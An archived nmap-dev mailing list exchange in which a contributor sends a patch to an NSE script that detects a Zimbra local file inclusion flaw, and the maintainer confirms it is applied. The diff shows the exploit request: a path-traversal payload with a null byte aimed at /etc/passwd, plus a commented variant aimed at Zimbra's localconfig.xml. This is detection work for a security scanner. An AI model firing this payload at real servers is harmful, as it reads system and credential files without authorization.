Home page logo
/

nmap-dev logo Nmap Development mailing list archives

Re: [NSE] Created NSE script to detect Zimbra 0 day
From: Daniel Miller <bonsaiviking () gmail com>
Date: Fri, 07 Feb 2014 09:36:36 -0600

On 02/07/2014 03:10 AM, Paul AMAR wrote:
Hi,

Got quite busy and I forgot about the task.

Here is the patch  :

Index: http-vuln-zimbra-lfi.nse
===================================================================
--- http-vuln-zimbra-lfi.nse    (revision 32704)
+++ http-vuln-zimbra-lfi.nse    (working copy)
@@ -87,8 +87,8 @@
    local file_long = "../../../../../../../../../etc/passwd"
    --local file_long =
"../../../../../../../../../opt/zimbra/conf/localconfig.xml"

-  local url_short =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_short .. "%00"
-  local url_long =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_long .. "%00"
+  local url_short =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_short .. "%00"
+  local url_long =
"/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="
.. file_long .. "%00"

    stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
    stdnse.print_debug(1, "GET " .. uri .. escape(url_short))

Cheers and thanks to Chris to remind me.
Paul,

Thanks for this. Fixed in r32705.

Dan
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]